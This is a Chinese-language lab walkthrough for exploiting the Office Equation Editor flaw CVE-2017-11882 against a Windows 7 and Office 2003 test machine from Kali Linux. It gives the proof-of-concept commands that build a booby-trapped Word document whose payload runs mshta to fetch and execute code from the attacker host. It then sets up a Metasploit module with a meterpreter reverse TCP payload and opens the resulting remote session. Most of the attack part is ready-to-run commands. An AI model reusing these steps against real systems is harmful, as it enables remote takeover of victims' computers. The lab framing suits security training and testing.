一、实验环境
靶机:Windows7 office2003 IP:192.168.87.129
渗透机:Kali Linux 2021.4a IP:192.168.87.130
问题1:安装的office2003中插入-对象中没有Microsoft 公式 3.0
解决方法:工具-自定义-命令 类别“插入”中找到命令“公式编辑器” 将其拖到工具栏中,点击图标,提示该功能尚未安装,点击是进行安装。
二、使用POC代码生成word文件
root@kali:~/Desktop/CVE-2017-11882# python2 Command109b_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o calc.doc
上述代码生产的calc.doc文档在靶机上打开时会同时打开计算器,做测试用
root@kali:~/Desktop/CVE-2017-11882# python2 Command109b_CVE-2017-11882.py -c "mshta http://192.168.87.130:8080/11882" -o exploit.doc
上述代码生成的exploit.doc文档即攻击文档,备用。其中IP地址为渗透机Kali的IP地址,注意修改
问题2:Kali Linux 14.4a终端中python指令不存在,需用python2或python3执行,这里使用python3会报错
SyntaxError: Missing parentheses in call to 'print'. Did you mean print("[!] Primitive command must be shorter than 43 bytes")?
因此使用python2执行
三、加载PS_shell.rb模块
将PS_shell.rb拷贝至路径/usr/share/metasploit-framework/modules/exploits/windows/smb下
在msfconsole中reload_all进行更新!!!
问题3:将PS_shell.rb改名为CVE-2017-11882.rb时会出现加载失败,发现是-符号的问题,可改名为CVE_2017_11882.rb
四、攻击流程
1、在Kali终端执行msfconsole
2、search CVE_2017_11882
3、use exploit/windows/smb/CVE_2017_11882
4、set payload windows/meterpreter/reverse_tcp
5、set LHOST 192.168.87.130(注意此处与生成exploit.doc文档的代码需相同)
6、set uripath 11882(注意此处与生成exploit.doc文档的代码需相同)
7、exploit
8、sessions(查看连接的会话)
9、sessions 1(进入连接,可以为所欲为了)